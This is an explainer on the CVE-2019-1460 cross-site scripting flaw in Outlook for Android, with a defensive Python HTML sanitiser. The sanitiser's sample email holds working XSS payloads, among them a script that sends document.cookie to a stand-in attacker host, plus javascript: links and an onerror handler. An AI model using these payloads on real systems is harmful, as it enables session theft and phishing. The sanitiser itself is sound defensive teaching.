Understanding the Vulnerability
The Cross-Site Scripting (XSS) Threat
An identified bug, CVE-2019-1460, exposes users of the Microsoft Outlook for Android app to cross-site scripting (XSS). Cross-site scripting is an injection flaw in which an attacker gets client-side script into content that a trusted application renders. Because the script is delivered as part of that trusted content, the victim's client cannot tell it apart from the application's own code and executes it with the privileges of the current user.
The Exploitation Mechanism
In this specific case, the vulnerability arises from the way Microsoft Outlook for Android parses certain email messages. An attacker triggers it by sending a specially crafted email; when the app renders that message, the script it carries executes. Cybersecurity Help, a Czech firm, attributes the flaw to insufficient sanitisation of user-supplied data, meaning the attacker-controlled message content reaches the rendering layer without the active content being stripped or neutralised.
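To make the root cause concrete, the following is an added example, not Microsoft's code and not a description of Outlook's actual rendering pipeline, of the kind of input sanitisation whose absence the report describes: an allow-list HTML sanitiser for email bodies, run over a constructed message that carries the classic script-injection payloads. The tag and attribute allow-lists, the URL-scheme check, the dropped-content element list, and the sample message are all assumptions made for the demonstration.

```python
"""Allow-list HTML sanitiser for e-mail bodies (Python standard library only).

Added illustration of "sanitise user-provided data before rendering".
It is NOT Microsoft's fix for CVE-2019-1460 and makes no claim about how
Outlook for Android renders mail; all allow-lists below are assumptions.
"""
from html import escape
from html.parser import HTMLParser

# Tags an e-mail client can render without any scripting capability (assumed list).
ALLOWED_TAGS = {
    "p", "br", "div", "span", "b", "i", "u", "strong", "em", "blockquote",
    "ul", "ol", "li", "h1", "h2", "h3", "table", "thead", "tbody", "tr",
    "td", "th", "a", "img",
}
# Per-tag attribute allow-list. "style" and every on* handler are never allowed.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
# Only these URL schemes may appear in href/src; javascript:, data:, vbscript: are rejected.
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "cid:")
# Elements whose *content* must be dropped too, not merely their tags.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "svg", "math"}
VOID_TAGS = {"br", "img"}


def is_safe_url(value):
    """True only if value, after browser-style control-character stripping, uses an allowed scheme.

    Browsers ignore tabs/newlines inside a scheme, so "java\\tscript:" must be caught.
    """
    cleaned = "".join(ch for ch in value.strip() if ord(ch) > 0x1F).lower()
    return cleaned.startswith(SAFE_URL_PREFIXES)


class EmailHtmlSanitizer(HTMLParser):
    """Rebuilds the document from scratch, keeping only allow-listed tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities in text/attrs arrive decoded
        self.out = []
        self.drop_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag itself, its text still arrives via handle_data
        kept = []
        for name, value in attrs:  # HTMLParser already lower-cases names and decodes entities
            if value is None or name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers and anything not explicitly allowed are discarded
            if name in ("href", "src") and not is_safe_url(value):
                continue  # javascript:, data:, vbscript: and scheme-less URLs are discarded
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if self.drop_depth:
                self.drop_depth -= 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))  # re-encode <, > and & in text nodes

    # Comments, doctype and processing instructions fall through to the no-op defaults.


def sanitize_email_html(body):
    """Return a rendering-safe version of an untrusted HTML e-mail body."""
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# Constructed sample message: ordinary content mixed with the usual injection vectors.
CRAFTED_EMAIL = (
    '<p>Invoice attached. <b>Pay by Friday.</b></p>'
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(document.domain)">View invoice</a>'
    '<img src="x" onerror="alert(1)">'
    '<a href="&#106;avascript:alert(1)">Pay now</a>'
    '<div style="background:url(javascript:alert(1))">Note</div>'
    '<a href="https://example.com/invoice/42">Legitimate link</a>'
)

if __name__ == "__main__":
    print(sanitize_email_html(CRAFTED_EMAIL))
```

Run stand-alone, the script prints the message with the `<script>` element and its body removed, both `javascript:` links reduced to bare `<a>` tags (the entity-encoded one included, because the parser decodes `&#106;` before the scheme check runs), the `onerror` handler and scheme-less `src` stripped from the image, the `style` attribute dropped, and only the `https://` link preserved. The design point is that the sanitiser never tries to recognise "bad" markup; it reconstructs the output from an allow-list, so anything it does not understand is simply absent from what gets rendered.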
There is, however, a precondition. To execute this attack, the adversary must be an authenticated user able to deliver the crafted message to the prospective victim, rather than an anonymous remote sender; the original report phrases this as being authenticated on the same network as the victim.
Successful exploitation enables a range of malicious activity. Symantec classifies the issue as enabling spoofing attacks. Cybersecurity Help adds that an attacker could extract potentially confidential information, alter the content the victim sees rendered, and mount phishing and drive-by-download attacks, all from script that runs in the context of the current user. The practical mitigation is to update the app to a build that includes Microsoft's fix, which corrects how the affected messages are parsed.